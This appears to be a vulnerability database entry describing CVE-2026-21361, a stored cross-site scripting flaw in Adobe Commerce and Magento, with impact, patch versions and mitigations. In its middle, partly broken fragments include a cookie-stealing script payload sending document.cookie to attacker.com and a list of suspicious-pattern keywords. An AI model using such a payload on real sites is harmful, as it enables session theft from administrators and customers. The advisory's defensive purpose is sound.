
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-21361 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a high-privileged attacker to inject malicious scripts into vulnerable form fields. Affected versions include Adobe Commerce 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16 and earlier, as well as corresponding Magento Open Source and Commerce B2B releases. The vulnerability was disclosed on March 10–11, 2026, with Adobe releasing patches on March 10, 2026. It carries a CVSS v3.1 base score of 8.1 (High) (Adobe Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored (persistent) variant. A high-privileged attacker with administrative or elevated access can inject malicious JavaScript payloads into vulnerable form fields within the Adobe Commerce or Magento admin interface; these scripts are persisted server-side and subsequently executed in any victim's browser when they navigate to the page containing the compromised field. Exploitation requires user interaction — a victim must browse to the affected page — and the scope is changed, meaning the injected script executes in the context of the victim's browser session rather than the attacker's (Adobe Advisory).
Successful exploitation enables session takeover by executing attacker-controlled JavaScript in a victim's browser, resulting in high confidentiality and integrity impacts with no direct availability impact. An attacker could steal session cookies, harvest credentials, perform unauthorized actions on behalf of the victim, or modify page content to facilitate further attacks such as phishing or lateral movement within the platform. Because the payload is stored persistently, every user who visits the affected page is at risk, potentially amplifying the attack's reach across multiple victims including administrators and customers (Adobe Advisory).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into the vulnerable form field and save the record.<script> tags or encoded JavaScript.<script>, eval(, atob() should be treated as suspicious.Adobe has released security patches addressing CVE-2026-21361 as part of the APSB26-05 advisory published March 10, 2026. Administrators should upgrade to the following fixed versions: Adobe Commerce 2.4.4-p17 or later, 2.4.5-p16 or later, 2.4.6-p14 or later, 2.4.7-p9 or later, 2.4.8-p4 or later, or 2.4.9-beta1 or later (consult the official advisory for exact version mapping). As interim mitigations, restrict administrative access to trusted users only, implement Content Security Policy (CSP) headers to limit script execution, and monitor admin activity logs for unauthorized form field modifications (Adobe Advisory).
The vulnerability was covered as part of Adobe's broader March 2026 Patch Tuesday release, which addressed approximately 80 vulnerabilities across eight Adobe products. CIS Security issued an advisory noting multiple Adobe vulnerabilities could allow for arbitrary code execution in the broader patch batch. Coverage was largely routine, with no significant independent researcher commentary or social media controversy specific to CVE-2026-21361, consistent with its high-privilege-required exploitation precondition limiting immediate alarm.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."